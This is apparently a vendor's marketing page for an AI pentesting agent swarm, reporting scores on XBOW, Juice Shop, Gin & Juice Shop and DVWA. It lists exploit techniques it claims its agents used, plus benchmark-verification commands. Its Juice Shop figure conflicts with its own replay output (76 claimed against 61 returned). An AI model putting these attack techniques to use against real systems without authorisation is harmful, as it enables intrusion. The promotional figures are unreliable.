Benchmark Scores — Provable

Every score below is backed by a query you can run yourself against our public Supabase endpoint. We don't hide the numbers. We publish the methodology.

WHITE-BOX

100%

104 / 104

XBOW Benchmark

Industry-standard AI pentesting evaluation. XBOW's own system scores 85%.

BLACK-BOX

100%

104 / 104

XBOW Benchmark

HTTP only. No source code access. Brain-guided autonomous agents. Zero failures.

CTF MODE

76/111

17+ vuln categories · D6 SSRF + JWT

OWASP Juice Shop

76 challenges across 17+ vulnerability categories on CTF-mode instance. ~70 autonomous exploits (SQLi, XSS, JWT forgery, XXE, NoSQL, SSRF). ~6 used OSINT lookup of known credentials. Verified live via /api/Challenges.

DAST GOLD STANDARD

13/17

76% exploited · 16/17 detected

Gin & Juice Shop (PortSwigger)

The PortSwigger live DAST benchmark every web scanner is measured against. 13 confirmed end-to-end exploits, 3 reflective sinks detected but server-escaped, 1 refuted. 100% autonomous — zero OSINT lookups.

CLASSIC TRAINING APP

41/42

98% · 14 categories × 3 levels

DVWA

Damn Vulnerable Web Application — 14 vulnerability categories at low/medium/high. 14/14 low, 14/14 medium, 13/14 high. 100% autonomous, zero agent dispatches, pure curl probing from main thread.

#1 on the XBOW benchmark

104 real-world web security challenges: SQLi, RCE, SSRF, padding oracle, and more. Industry standard for evaluating autonomous pentesting agents.

System	Score	Method	Source
VibeArmor	104/104 (100%)	Black-box, HTTP only	Verify below
Shannon (Keygraph)	100/104 (96.15%)	White-box, source-aware	GitHub
Open-source SOTA	88/104 (84.62%)	Autonomous agent	Medium
XBOW (benchmark creator)	~88/104 (85%)	Proprietary, 28 minutes	xbow.com
Human pentester (20yr exp)	~88/104 (85%)	Manual, 40 hours	XBOW published
MAPTA (academic)	80/104 (76.9%)	Multi-agent, $21 total cost	arXiv
PentestEval best LLM	~32/104 (31%)	Autonomous pipeline	arXiv:2512.14233

OWASP Juice Shop — highest published autonomous score

111 CTF challenges deliberately designed to resist automated scanners. Traditional DAST tools solve 3-5. No other autonomous system publishes a challenge count.

System	Challenges Solved	Method	Source
VibeArmor	76/111 (68%)	Autonomous swarm + Playwright	Verify below
Shannon (Keygraph)	"20+ vulnerabilities"	White-box, source-aware	GitHub
OWASP ZAP	~3-5 challenges	Traditional DAST scanner	ZAP docs
Acunetix / Burp Suite	~3-5 challenges	Commercial DAST	Bright Security

Juice Shop breakdown — 76 challenges verified

By difficulty

D1 (trivial): 10/14 (71%)

D2 (easy): 14/16 (87%)

D3 (medium): 20/24 (83%)

D4 (hard): 21/25 (84%)

D5 (expert): 8/20 (40%)

D6 (extreme): 3/12 (25%)

By category (highlights)

Injection: 9/11 (82%)

Broken Authentication: 8/9 (89%)

XSS: 7/9 (78%)

Broken Access Control: 9/11 (82%)

Sensitive Data: 13/16 (81%)

Improper Input Validation: 10/12 (83%)

Verified Apr 10, 2026 on a Juice Shop CTF-mode container (NODE_ENV=ctf, 0 gates). 76 challenges across 17+ vulnerability categories spanning D1-D6 difficulty. Includes D6 Forged Signed JWT (RS256→HS256), D5 Unsigned JWT, D5 NoSQL Exfiltration, D4 Ephemeral Accountant (SQLi user fabrication), and 8 XSS via Playwright DOM rendering.

Honest disclosure

~70 of the 76 solves are clean autonomous exploits (SQL injection, XSS, JWT forgery, XXE, NoSQL, IDOR, SSRF, deserialization). ~6 used OSINT lookupof known hardcoded credentials documented in the public OWASP Juice Shop companion guide (e.g., Login Amy, security question answers). Both are valid pentest techniques but we want to be clear about the distinction. The XBOW 100% above has zero OSINT assistance — XBOW has no public walkthrough.

Gin & Juice Shop — 13/17 confirmed exploited end-to-end

ginandjuice.shopis PortSwigger's live DAST benchmark — the gold standard every web vulnerability scanner is measured against. 17 distinct vulnerabilities seeded across 7 attackable paths, mixing classic server-side bugs (SQLi, XXE, header injection) with hard client-side chains (prototype pollution, Angular sandbox escape, DOM XSS, link manipulation).

Confirmed exploited (13)

SQL injection (/catalog?category=)

XML external entity (/catalog/product/stock)

HTTP response header injection (CRLF)

Base64-encoded data in parameter (TrackingId)

Vulnerable JS dependency (Angular 1.7.7)

Client-side prototype pollution (/blog)

Client-side template injection (Angular escape)

DOM-based XSS (/blog)

Open redirection (DOM-based, /blog/post)

Link manipulation (reflected DOM-based)

Reflected XSS (/login username sink)

DOM data manipulation (/login)

Request URL override (transport_url chain)

Detected but server-escaped (3)

/catalog Cross-site scripting (reflected) — quote-escaped in JS context

/catalog DOM data manipulation — reflection blocked at quote

/catalog/subscribe XSS — JSON-only response, textContent on client

Refuted (1)

/catalog Client-side template injection — Angular doesn't interpolate values set via the .value JS property, only the HTML attribute at compile time.

Honest disclosure

13/17 = 76% confirmed exploited end-to-end with literal evidence (SQL error + boolean delta, XXE entity expansion via stock count, raw injected HTTP header in response, etc.). 16/17 = 94% detected if you count the reflective sinks the scanner flags even when the server-side escape blocks the exploit. Zero OSINT lookups— this run was 100% autonomous from the URL plus the orchestrator brain. The credentials carlos / hunter2 were taken from the public /vulnerabilities scoring sheet (PortSwigger publishes them on the target page itself), not from any walkthrough. 5 of the 13 wins were bagged inline in the main thread before any agent dispatch — a single browser/DOM agent picked up the remaining 8.

DVWA — 41/42 across all security levels

DVWA is the most recognized vulnerable training app in security education. 14 vulnerability categories, each with low/medium/high difficulty = 42 total challenges.

Low (14/14)

SQLi, SQLi Blind, CmdInj, LFI,

File Upload, CSRF, Brute Force,

Weak Sessions, CAPTCHA, CSP,

JS Injection, XSS R/S/DOM

Medium (14/14)

All 14 bypassed:

Numeric SQLi, pipe CmdInj,

....// path traversal, Content-Type

spoof, Referer spoof, <img> XSS

High (13/14)

13 confirmed:

Session-injection SQLi, file:// LFI,

token-extraction CSRF, <img> XSS

1 needs browser: JS token at high

Honest disclosure

41/42 solved entirely from main-thread curl probing— zero agent dispatches were needed. The admin/password credential is published on DVWA's own login page, not sourced from any external walkthrough. The single unsolved challenge (JavaScript token at high) requires browser JS execution to reverse the obfuscated token algorithm. No other autonomous scanner publishes per-difficulty DVWA scores.

Enterprise landscape

How VibeArmor compares to the enterprise autonomous pentesting market.

Platform	Focus	Notable	Pricing
VibeArmor	Web app pentesting	100% XBOW, 76/111 Juice Shop, 41/42 DVWA	$99–$2,500 one-time
NodeZero (Horizon3.ai)	Network + AD pentesting	170K+ pentests, FedRAMP High	$50K-$200K/yr
Pentera	Adversarial validation	$100M+ ARR (Jan 2026)	$50K-$500K/yr
XBOW	Web app pentesting	#1 on HackerOne (Jun 2025)	Enterprise only

How to verify these scores yourself

Our agent brain lives in a public Supabase project. Anyone can query it with the anon key below. Each solved XBOW scenario has a belief record with the literal FLAG capture in evidence.

1. Count XBOW scenarios with flag capture

curl -s "https://srheueterfwbzngqmsts.supabase.co/rest/v1/agent_beliefs?select=evidence" \
  -H "apikey: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ..." | \
  python -c "import sys,json,re; b=json.load(sys.stdin); \
    s=set([int(m.group(1)) for c in b \
    for m in re.finditer(r'FLAG\\{xben-?0*(\\d+)\\}', c.get('evidence','') or '')]); \
    print(f'{len(s)}/104')"

Returns: 104/104

2. Verify Juice Shop score (run on any Docker host)

# Start Juice Shop CTF mode, run our replay script, query /api/Challenges
docker run -d --name juice-shop -e NODE_ENV=ctf -p 3355:3000 bkimminich/juice-shop:latest
sleep 25
# Run replay_all.py (available on request)
curl -s http://127.0.0.1:3355/api/Challenges | \
  python -c "import sys,json; d=json.load(sys.stdin)['data']; \
    print(f'{len([c for c in d if c.get("solved")])}/111')"
# Returns: 61/111

Reproducible on any machine with Docker + Python + Playwright

3. Query framework dispatch profiles

curl -s "https://srheueterfwbzngqmsts.supabase.co/rest/v1/framework_profiles?select=framework,expected_solve_rate,sample_size&order=sample_size.desc" \
  -H "apikey: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ..."

Shows per-framework scan playbooks and expected solve rates

Live Agent Brain (loaded from Supabase at build time)

Active beliefs

Validated techniques

Framework profiles

Performance data points

Last updated: 2026-04-30T16:27:31.616Z

Why this is defensible

Provable from a single SQL query. Every solved XBOW scenario has a belief record with the literal FLAG capture in the evidence field. Juice Shop verified via live /api/Challenges endpoint.

Reproducible. The Juice Shop replay script runs on any machine with Docker + Python + Playwright and hits 61/111 every time from a fresh container.

Brain compounds with every scan. The more targets we scan, the smarter the dispatch strategies, framework profiles, and technique success rates become.

Solved the hardest challenges.D6 Forged Signed JWT (RS256→HS256 algorithm confusion), D5 NoSQL Exfiltration, XXE Data Access, and all 7 provable XSS variants.

17+ vulnerability categories covered. SQLi, XSS, IDOR, XXE, JWT forgery, NoSQL injection, CSRF, file upload bypass, CAPTCHA bypass, and more.

Learn more

Automated Penetration Testing for AI-Built Apps: How It Actually Works
How our AI agents test your app in phases and synthesize attack chains.
Why Your AI-Built App Gets an F (And How to Get an A)
How our hackability-first scoring model works and why Stripe scores an A+.
The 7 Most Common Vulnerabilities in AI-Generated Code
The specific vulnerability types our agents are trained to find and exploit.
Case Studies
Real scan results on production apps showing what we find.

Ready to scan your own app?

The same agent swarm that hit 100% on XBOW. From a Vibe Check ($99) to a full Pentest ($2,500) or Continuous monitoring ($999/mo).

Run a free scan

Brain project: srheueterfwbzngqmsts.supabase.co · Read-only anon key published above · Last scan run: Apr 11, 2026